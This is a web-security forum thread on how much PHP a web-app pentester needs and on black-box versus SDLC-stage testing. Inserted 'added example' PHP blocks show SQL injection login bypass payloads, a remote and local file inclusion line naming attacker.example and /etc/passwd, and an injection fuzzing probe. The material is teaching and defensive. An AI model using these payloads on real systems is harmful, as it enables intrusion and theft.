to be a professional web-application pentester?

Viewing 21 reply threads
    • #5455
      mesho
      Participant

      hello guys,

      In order to be a professional penetration tester for web applications, I know that I must learn HTML, JavaScript, PHP, etc.

      For PHP, is the PHP manual on php.net sufficient, or should I pick a book to learn the language very well and program with it?

      Because I really hate programming in PHP.
      But I insist on becoming a professional in discovering/exploiting PHP bugs such as:
      SQL Injection / Remote File Inclusion / Path Disclosure, and a lot more.

      thanks,

    • #34447
      caissyd
      Participant

      Do you already know another programming language VERY WELL? If that is the case, understanding PHP should be enough. But if this is your first language, I suggest you learn Java or C# first. They are more structured and you will learn to code “properly”. PHP will be very easy after one of these two. Again, this is only if you don’t have much programming experience.

      Add CSS, XML, XML Schema, SOAP (including WSDL), Java and C# to this list!

    • #34448
      mesho
      Participant

      I already know the basics of C, so I think shifting to other languages will be easy, but my question is: is it enough for a pen-tester to read the manual of a language like PHP from the main PHP site, or does he need to buy some books and do hard coding with PHP in order to find vulnerabilities inside PHP web applications?

      In brief, if I want to penetrate a PHP web application, do I need to be an expert programmer in PHP, or will reading the manual and knowing how things work get the job done?

    • #34449
      morpheus063
      Participant

      Well, personally speaking, I suggest that having some level of hands-on programming experience with PHP really helps compared with just reading the manuals and understanding the concepts.

      There is a “real” difference in doing things and reading things 🙂

    • #34450
      caissyd
      Participant

      @mesho, when you do a web app pentest for a client that has a PHP based web site, it depends if you are doing a black box or a white box test.

      With a black box test, you are basically coming from the internet with no knowledge of the application. You will only know that PHP is used by looking at the framework from the outside. But you won’t see PHP code.

      The white box test gives you access to everything, including the source code. So a quality pentest/vulnerability analysis requires you to audit the source code. You have to understand PHP pretty well in order to do that…

      I hope this answers your questions.

    • #34451
      mesho
      Participant

      thanks guys for your answers,

      I think learning the most-used web application languages from books and trying to master them will be a real pain for a penetration tester; that’s why I’m asking if the online material (manuals) for a specific language will be sufficient in order to audit source code in that language. Of course, only if that person is already a programmer!

      so what do you think fellows?

    • #34452
      caissyd
      Participant

      I personally like to write a “Hello World” program, then I follow a book to learn the basic stuff.  After 5-7 chapters in a book, I go back to coding my own stuff. Once I hit a wall, I google to find my answers.

      Basically, the important thing is to learn. So if a book is your thing, go for it. If you prefer videos (I do!) then do that. But if you prefer trials/errors, it isn’t bad either as long as you learn from “nice” code.

      For PHP, I propose you download a PHP framework and start reading the code in it. Try to follow the trace of a login from HTML/CSS to PHP and SQL. Usually, framework code is well written. If you don’t understand something, Google is your friend!  😉
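
      The trace just described, from the login form into PHP and SQL, as an added example that is not code from the thread or from any framework mentioned in it. It shows two of the bug classes from the opening post (SQL injection and remote/local file inclusion) in a vulnerable and a hardened form, the way a white-box reviewer would read them side by side. The schema, the user row, the function names, the page map and the use of in-memory SQLite via PDO in place of the application's real database are all assumptions made for this example.

```php
<?php
// Added example, not code from the thread: the trace a white-box reviewer follows
// from the login form into PHP and SQL, showing two of the bug classes named in
// the opening post (SQL injection, remote/local file inclusion) in a vulnerable
// and a hardened form. The schema, user row, function names and page map are
// assumptions for this example; in-memory SQLite stands in for the real database.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)');
$db->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)')
   ->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);

// ---- 1. SQL injection --------------------------------------------------------
// Vulnerable: the form field is concatenated into the query text, so the
// attacker's input becomes part of the SQL grammar, not just a value.
function loginVulnerable(PDO $db, string $user, string $pass): bool
{
    $sql = "SELECT password_hash FROM users WHERE username = '" . $user . "'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($pass, (string) $row['password_hash']);
}

// Hardened: a prepared statement sends the value separately from the SQL text;
// quotes in $user can no longer change the query's structure.
function loginHardened(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($pass, (string) $row['password_hash']);
}

// Even with hashed passwords the concatenated query is exploitable: the attacker
// UNIONs in the hash of a password they chose, so password_verify() checks their
// own hash instead of alice's. The trailing "-- " comments out the closing quote.
$attackerHash = password_hash('whatever', PASSWORD_DEFAULT);
$payload = "x' UNION SELECT '" . $attackerHash . "' -- ";
var_dump(loginVulnerable($db, $payload, 'whatever'));    // bypass: no valid account needed
var_dump(loginHardened($db, $payload, 'whatever'));      // looked up literally, no such user
var_dump(loginHardened($db, 'alice', 'correct horse'));  // the legitimate login path

// ---- 2. File inclusion -------------------------------------------------------
// Vulnerable: include() on a request parameter. With allow_url_include=On this
// pulls code from an attacker's server (RFI); with it off, "../" still walks the
// local filesystem and echoes whatever it reads (LFI). Never call this outside a
// throwaway sandbox; it is defined here only to be read.
function renderPageVulnerable(string $page): void
{
    include $page;   // ?page=http://attacker.example/shell.txt  or  ?page=../../../../etc/passwd
}

// Hardened: the parameter selects from a fixed map and never becomes part of a
// path. Returns the chosen file so the decision is testable without the files.
function resolvePageHardened(string $page): ?string
{
    $allowed = ['home' => 'pages/home.php', 'about' => 'pages/about.php'];
    return $allowed[$page] ?? null;   // caller: include __DIR__ . '/' . $file, or send 404 on null
}

var_dump(resolvePageHardened('about'));
var_dump(resolvePageHardened('../../../../etc/passwd'));
var_dump(resolvePageHardened('http://attacker.example/shell.txt'));

// ---- 3. Path disclosure ------------------------------------------------------
// The third bug class from the opening post usually needs no code: an uncaught
// error with display_errors=On prints the script's absolute path to the browser.
// The production settings are display_errors=Off and log_errors=On in php.ini.
```

      Reading it the way the post suggests: the form field arrives in `$user`, the vulnerable function lets it rewrite the SQL, the hardened one hands it to the driver as data. The same pattern (input becomes syntax versus input stays a value) is what to look for in `include`, `eval`, `system` and `header` calls when auditing a framework's login path.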

    • #34453
      sil
      Participant

      My two cents on this… Focus on “the core.” Web applications are more than LAMP (Linux Apache MySQL PHP). What will end up happening is, you will focus furiously on PHP and that’s all you’ll be good at testing. What happens when you move into an AJAX environment? Most large companies use SOAP/AJAX/etc. more than they use LAMP set-ups. LAMP setups, from my experience, tend to be the lower-hanging fruit often used by companies with limited to no budget. E.g., name me one financial company using a LAMP environment for their infrastructure. One insurance company. Etc.

      If you *choose* to learn PHP, unless you want to become a PHP programmer, learn the basics of PHP SECURITY related material (the core of what you need, how it works). Same goes for AJAX. You’d need to set out to be an expert Java programmer, expert XML programmer to truly understand it however, this doesn’t stop you from learning the core.

      So if you’re going to do this professionally, go with where the money is. AJAX. Otherwise, one could look back to, say, Perl when “Mason” was “the next big thing”, or Python, Ruby, etc. As for blackbox/whitebox, I’ll add another two cents… Aim for a blackbox test.

      In a whitebox test, you WILL run into staff that assume a security assessment/audit/pentest is being done and WILL lay blame: “That pentester will cost me my job!” and they’ll end up trying to defend against you. This gives them a false sense of security since they’ll implement measures against you, while missing the overall point.

      If you HAVE TO or the client CHOOSES to have a whitebox/crystal/grey/etc., then you’d want to work with the admins to let them know exactly what you’re going to do, and you’re not there to pull punches but solely show what an attacker can potentially do.

    • #34454
      hayabusa
      Participant

      sil’s comment about requesting a blackbox test is one that I rely on, a LOT.  I find that, many times, if the IT / security staff are aware of the testing, then they throw up protections that aren’t normally there, or ‘start’ reviewing logs more closely, when the idea of pentests is to clearly show areas, not only in system security, but often times, in security ‘posture’ as well. 

      While there’s not necessarily a need to ‘point out’ that XYZ person doesn’t watch the logs closely, in your report (and you could assure XYZ you wouldn’t do that, IF you were asked / forced to do whitebox, etc,) you could use it as a way of promoting add-on products or services to the environment, that could make XYZ’s job easier, such as something like Novell’s Sentinel Log Manager, or various other products, which help to perform the tasks AND show a cost / time savings that benefits the company, and would allow XYZ to work on other projects to better the security posture.  This way, you’ve shown them value, both in noting that things could otherwise have gone overlooked, as well as providing them with an alternative solution, which could yield you more work down the road, because you’ve shown you truly WANT to better them, not just spend your time doing more ‘auditing’ type work, etc.

      Goes a long way towards your viability, in your customers’ eyes.

      Now, there’s absolutely no reason NOT to accept the other types of engagements (whitebox, etc,) as he noted, if they’re relevant, or if that’s the true request from the folks engaging your services. 

      Also, as sil and others said, you don’t have to be a guru programmer in any given programming / web application language.  In fact, if you understand the basic principles and concepts behind what each does, and have SOME knowledge to work from, then you can go a long way in web-app pentesting.  Just get comfortable with the basics of many of the languages, to where you’re content to dig up example code (and understand it) if needed, during your projects and learning.  And yes, as sil pointed out, AJAX is the ‘big boy on the block’ right now, so it definitely wouldn’t hurt to spend more time in the Java / XML realm, etc., if you’ve got it.  And SOAP is right there with it, from the environments I’ve dealt with.

      On the flip side, if you want to become a pentesting tool developer, knowing how to code in Ruby and Python goes a long way, as well, as many of the frameworks and such are written in those languages.  But even then, you MUST have understanding of the other languages, or writing exploits in Ruby or Python still isn’t going to be an easy task…

    • #34455
      caissyd
      Participant

      @sil and @hayabusa: I guess we have different clients. I am more and more involved BEFORE a new web application is released. Developers and team leads that I work with are happy to see me arrive. Most of the time, they say: “I know nothing about security, can you teach me how you find these things?”. It’s not really a pentest, but it is in a way.

      I start right after they are done coding and I do all my stuff during the testing phase. The more stuff I find, the happier the developers, because they know they won’t get busted once the app is in prod. But I am careful not to stress their clients…

      All that to say, I do about 50% of vulnerability assessments, 30% of “security through SDLC” and 20% pentest of existing web apps.

      And I have a fraction of the experience sil and hayabusa have!!!  😉

    • #34456
      hayabusa
      Participant

      @H1tM0nk3y – I bet you sell yourself short on that experience thing!  (Maybe not, as I don’t personally know you, but just saying…)  I follow your thoughts on this, and from your perspective, I see why you feel that way.  Heck, if my clients and situations were the same, I’d very likely have given similar advice and perspective on this.  ;D

      I also think that, for me anyway, I learn much the same as you (I prefer to learn through experience, with my own coding and lots of practice, as I read, rather than simply following through an entire book / course, first.  I get to a point where I understand enough to start jumping in more head first, and go for it.  …and I also love video training!)  So believe me when I say, we’re not THAT different.  In fact, when I said ‘sil and others’, I was putting some of what you said in, by inference, as well.

    • #34457
      caissyd
      Participant

      @hayabusa – The fact that we spend so much time on EthicalHacker.net means we are not that different!  😉

    • #34458
      mesho
      Participant

      thanks all for the great explanations,  😉

    • #34459
      hayabusa
      Participant

      @H1t M0nk3y wrote:

      @hayabusa – The fact that we spend so much time on EthicalHacker.net means we are not that different!  😉

      No doubt!  Well, in my case, anyway, it helps that in my primary job, I work from a VOP (home) office, and while doing my day-to-day, I often just leave EH-Net running in the background, and glance at it, on my second screen, periodically, to see if anything new / ‘interesting to me’ has been posted.

      That, and the primary folks here understand and think as we do, so it certainly makes for more enlightening conversations throughout the day!  (Not the “Same ol’, same ol'”  😛 )

    • #34460
      sil
      Participant

      @H1tM0nk3y – when the availability is possible to stick around at a client for the full development life-cycle of a product, then I’m all for it however I’ll quote: “Would you rather push out the next release or spend time patching the current one?” (Rev. Bill Blunden – The Rootkit Arsenal).

      Companies don’t care to spend on Fortify, Klocwork, beStorm, etc., and even if they did, the developers most of the time won’t get it, and even if they *do* get it, they’re often under tight deadlines to push out the “next release.”

      There are plenty of instances that I can quote to prove a point but I’ll choose one; the talk of the town right now. Tavis Ormandy’s Help Center disclosure (http://seclists.org/fulldisclosure/2010/Jun/205) To be outright blunt, many people have failed to look at the reality of it all, they don’t care to, it doesn’t mean anything to them, they’d rather point the finger for their own issues than fix them:

      hcp:// has been broken a few times over the years, for example:

      http://seclists.org/bugtraq/2002/Aug/225, Delete arbitrary files using Help and Support Center
      http://www.microsoft.com/technet/security/bulletin/ms03-044.mspx, HCP memory corruption by Dave Litchfield.

      How can a company keep making the same repetitive mistakes? It’s pure negligence and it shows the lack of investment in security in the SDLC. So it’s one thing (wishful thinking) to have the luxury of implementing security controls at the development phase (phase 2 of the SDLC) and it’s completely another implementing it in the initiation phase (phase 1 of the SDLC) (ref: http://csrc.nist.gov/groups/SMA/sdlc/index.html). As it stands right now, the practicality of coming in as a pentester from the ground up (phase 1) would be a waste of time. At phase 2 it would be a waste of time; in fact, until it’s a product, it’s a waste of time. This does not mean a company should have its workers tapping away at the keyboards releasing whatever it is they’re producing “right here right now”, then coming back after it’s deployed to find holes.

      At the initiation phase, programmers, project managers, etc., need to think outside of the frameworks and step into reality:

      Current reality
      PM: “We’re making a program that will allow people to chat with each other”
      Developer: “We can make it transfer files and send icons!”
      PM: “We have two months to get this done”

      Ideal reality:
      PM: “We’re making a program that will allow people to chat with each other”
      Developer: “We can make it transfer files and send icons however we need to be careful as to avoid having people spoof, inject code”
      Other Developer with Security Experience: “Definitely… We need to test the code along the way with protocol fuzzers, application fault injection programs, etc., to make sure no one steals or subverts the application”
      PM: “You’re right, the last thing we need is a corporation being compromised because we didn’t check. We could look like fools and lose $N amount of money”
      PM: “Other_Developer, work with Developers to make sure we put out a rock solid program. We have two months to get it done and I want further testing even after it’s released”

      If you’re the “corporate pentester” then it will work for you however, doing contract work (hired gun pentesting) you’re better off as a company paying to train your developers to understand security. Getting it before it even goes into the mainstream. It’s more cost-effective to fork out say 10,000.00 to pay for your programmers to take courses at places like Immunity, Dino Dai Zovi’s courses, Alex Sotirov’s courses where your developers will come out understanding “security risk” from the programmers point of view, than it is to fork out millions in “patching the current one.”

      But alas, reality is what reality is and companies would rather spend money on deflection – marketing away security holes (http://www.sophos.com/blogs/gc/g/2010/06/15/tavis-ormandy-pleased-website-exploits-microsoft-zeroday/) – than they would on training. Companies have it backwards and don’t care to change this stance (marketing versus training versus implementing security). It’s much easier and cost effective to spend a couple of thousand in damage control than it is to put out clean code. At the end of the day, blame the consumer though, for continuously buying buggy software and thinking that “they’re seeing history” is good news.

      Microsoft has never in its history released 14 patches on a single patch Tuesday, making August 10th, somewhat of a non celebratory record.
      http://www.coated.com/microsoft-patch-tuesday-patches/

    • #34461
      caissyd
      Participant

      As it stands right now, the practicality of coming in as a pentester from the ground up (phase 1) would be a waste of time. At phase 2 it would be a waste of time in fact, until it’s a product, it’s a waste of time.

      @sil – I disagree with this. Maybe because I was a developer and especially, an application architect before, but there is an enormous bonus of having a security guy involved at the early stage of the development of a system.

      I agree you can’t do a pentest while reading business requirements, but at the very beginning of a project, you can help the Project Manager set a preliminary budget for security. Is the project about exchanging money between 2 big banks, or is it a static web intranet site displaying non-sensitive data? Even with only the Project Charter, you can for example tell a PM to put money aside to hire 3 full-time security specialists, or just have the security team test the application before it gets released.

      Also, the solution architect and the application architect are setting up the web app framework at the beginning of the development process. Business Analysts are writing test cases before developers start developing.

      Also, I often train developers BEFORE they start coding on project specific components. For example, if the team has never implemented SOAP requests between 2 systems, I will:

      1) First work with the architect so he can securely set up the framework
      2) Then I will train the developers on implementing the solution properly
      3) I will help the testers write proper test scripts and test cases
      4) Once a module (or even a prototype!) is ready, I will go on and fuzz it, etc. This helps me find security problems early in the game so they don’t reproduce them many times.
      5) At the end of the development, I make sure a vulnerability assessment is done, I review the code, I make sure all test scripts passed, I check the overall solution, etc.

      So to me, getting involved at an early stage of project is the key in meeting the project deadline and in implementing good security. In addition, the developers get better and better at this.

      What do you guys think?
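
      The “fuzz it” step in the post above, as an added example that is not code from the thread. It is the kind of error-based probe a tester runs against a login handler, whether as step 4 against a freshly built module or from outside in a black-box test: feed a benign baseline, then quote and comment characters, and watch for two tells, a database error leaking back (input reached the SQL parser) and a changed response to a tautology (the query’s logic was altered). To run offline it targets a constructed legacy-style handler backed by in-memory SQLite instead of an HTTP endpoint; the handler, its schema and the payload list are assumptions made for this example.

```php
<?php
// Added example, not from the thread: a minimal error-based injection probe of
// the kind run during the "fuzz it" step or a black-box test. The target is a
// constructed legacy-style login handler backed by in-memory SQLite; in a real
// engagement each call would be an HTTP POST to the login form instead.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (username TEXT, password TEXT)");
$db->exec("INSERT INTO users VALUES ('alice', 'correct horse')");   // constructed sample row

// The target under test: concatenates both fields into the query (the bug).
function target(PDO $db, string $user, string $pass): string
{
    $sql = "SELECT username FROM users WHERE username = '$user' AND password = '$pass'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ? 'Welcome ' . $row['username'] : 'Login failed';
}

// Probe set: baseline, metacharacters that should break a concatenated query,
// and payloads that should change the query's logic if they reach the parser.
function probe(PDO $db): array
{
    $cases = [
        'baseline'  => ['alice', 'wrong'],
        'quote'     => ["alice'", 'wrong'],        // unbalanced quote -> syntax error
        'dquote'    => ['alice"', 'wrong'],        // harmless inside a single-quoted literal
        'tautology' => ["' OR 1=1 -- ", 'wrong'],  // WHERE becomes always-true
        'comment'   => ["alice' -- ", 'wrong'],    // password check commented away
    ];
    $findings = [];
    foreach ($cases as $name => [$u, $p]) {
        try {
            $resp = target($db, $u, $p);
            // The baseline must fail; any other outcome means the payload altered the query.
            $findings[$name] = $resp === 'Login failed' ? 'no change' : 'RESPONSE CHANGED: ' . $resp;
        } catch (PDOException $e) {
            // A database error surfacing on a metacharacter: input reached the SQL parser.
            $findings[$name] = 'DB ERROR: ' . $e->getMessage();
        }
    }
    return $findings;
}

foreach (probe($db) as $name => $result) {
    printf("%-10s %s\n", $name, $result);
}
```

      Against a real site the “DB ERROR” branch corresponds to a 500 or a visible SQL error message, and the “RESPONSE CHANGED” branch to a login page that suddenly greets you; the baseline case is there so you know what “no change” looks like before reading the rest. Note that the double-quote case comes back clean, which is exactly why a probe set needs more than one metacharacter.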

    • #34462
      hayabusa
      Participant

      I personally think it’s a matter of opinion, and perspective from which the discussion comes.  I can certainly see, if you’re employed with a company as a security professional, the benefit of proactive analysis and assistance in setting things up.  IF your management understands that role and appreciates it, as well, then all the better. 

      On the flip side, if you’re an outsider, as sil and I are, then I most certainly wouldn’t want to be involved that early, as it leaves the potential for the insiders to lay blame, or to say something was known early on, and used outside of scope, etc.

      So it just depends on the situation, in my eyes.  I see both sides, and understand both points of view.  I think your thinking, H1tM0nk3y, is valid, for your circumstances, and I think sil’s is, for his.

      My 2 cents, anyway…

    • #34463
      sil
      Participant

      @H1t M0nk3y wrote:

      you can help the Project Manager setting a preliminary budget for security.

      This in itself is and will always be an issue. We (administrators, engineers, architects) ask for money and when it comes to security, there is only fuzzy math you can use to justify the need for more money. Ever hear a discussion on the ROI of, say, a firewall? There is no ROI. Ask yourself this question: what is the ROI for the lock you put on your car? The ROI for the alarm you have on your car? What you’re left with is “insurance”, not a definitive or sensible numeric value to go by. YOU can say “well I paid 40k for my car” while your insurance company can say “well it’s worth 18k” while Edmunds or Carfax can say it’s worth 30k. What you have are just opinions. What is your car worth to you? Would it be safe to say that your car is worth its price and the cost of your salary if you couldn’t drive yourself to work?

      @H1t M0nk3y wrote:

      Is the project about exchanging money between 2 big banks or is it a static web intranet site displaying non sensitive data? Even with only the Project Charter, you can for example tell a PM to put money aside to hire 3 full time security specialists or just have the security team test the application before it gets released.

      This is the failure: “have the security team test the application before it gets released.” What about having the guidelines beforehand and testing it all throughout the development phase? For example, phase 1: “It sends IMs, make sure no tainting (fault injection) can be done.” During phase two, the programmer goes through his code checking for buggy code, buggy calls (malloc, strcpy, etc.). All the way throughout the phase, ESPECIALLY during the initiation phase, it needs to be done. Many pentesters aren’t programmers and many programmers aren’t pentesters. At the end of the day, the initial coding team will understand how a process works, why it does what it does. They need to be more vigilant about calls, procedures, etc. You don’t wait until pre-release to test it; otherwise what you may end up doing is having to go back through ALL of the code. On some systems this is extremely time consuming, and we know in business, time is money.

      @H1t M0nk3y wrote:

      1) First work with the architect so he can securely set up the framework
      2) Then I will train the developers on implementing the solution properly
      3) I will help the testers write proper test scripts and test cases
      4) Once a module (or even a prototype!) is ready, I will go on an fuzz it, etc. This help me find security problems early in the game so they don’t reproduce it many times.
      5) At the end of the development, I make sure a vulnerability assessment is done, I review the code, I make sure all test sripts passed, I check the overall solution, etc.

      This is great for new applications, but for existing applications it makes little difference, as stated before: do you think they’d rather focus on the new release or spend money on an old and buggy one?

      @H1t M0nk3y wrote:

      So to me, getting involved at an early stage of project is the key in meeting the project deadline and in implementing good security. In addition, the developers get better and better at this.

      We’re in complete agreement here about beginning as early on as possible however, the subject for this thread is “to be a professional web-application pentester?” not “to be a professional web-application security coder?” 😉

      As a pentester, I don’t really care if someone followed the SDLC. This is of little importance to me; in fact, I hope they DIDN’T follow any SDLC, as it makes my job a heck of a lot easier. As a “secure web application developer” this is quite a completely different story. If I had to play an “application security researcher” then it’s again another story. However, risk analysis trumps all of these arguments from both me and you. For example, if whatever application we’re talking about resides behind, say, a private network, do you (as a company) want to spend *that* much money worrying about someone potentially running perl -e ‘print “%80x. :x40;’ locally (remember I said it’s in a private network)? The answer is low, so a manager will minimize this risk, often accepting it.

      PM: “The odds of this happening are phenomenally low”
      SecurityProfessional: “The reality is, if a client-side exploit hit the machine, it’s vulnerable”
      PM: “What MS/Apple/etc., do with their security is one thing. We can’t worry about OUR security because of their INSECURITY”

      Ad-nauseum … It’s a nice methodology to want to follow however, most companies are driven by “right here right now… get it done!” where security is a secondary concern (if even that). So it’s not that I disagree with you, I don’t agree that this is a “pentester’s” role per se. At least not in regards to the initial post.

      Lastly, NO NO NO I don’t mean to sound rude/argumentative, in fact, I’m just in a thinkative state 😉 Before someone says… “what an ass”

    • #34464
      hayabusa
      Participant

      And sil does have a point… this thread was instantiated with the subject of pentester in mind, so to that end, I’ll say, touché, sil.  😉

      This was a very insightful thread, and again, as sil stated in his, we definitely ALL agree, that the earlier you can get involved, the better.  It’s a matter of what your role is, and how you’ve been tasked / requested to perform it.

    • #34465
      caissyd
      Participant

      Ok, I agree with you guys. “pentest” was the topic of this thread, but the focus was “learning PHP”!  😉

      I really like this site!  ;D

    • #34466
      hayabusa
      Participant

        Always enlightening for us all!

    • #34467
      T_Bone
      Participant

      Well this is certainly an intense discussion and one of which I have thoroughly enjoyed reading. 

      @Sil – This is my favourite comment of the whole discussion being a Junior pen tester myself :):

      “As a pentester, I don’t really care if someone followed the SDLC. This is of little importance to me in fact, I hope they DIDN’T follow any SDLC as it makes my job a heck of a lot easier”

Copyright ©2021 Caendra, Inc.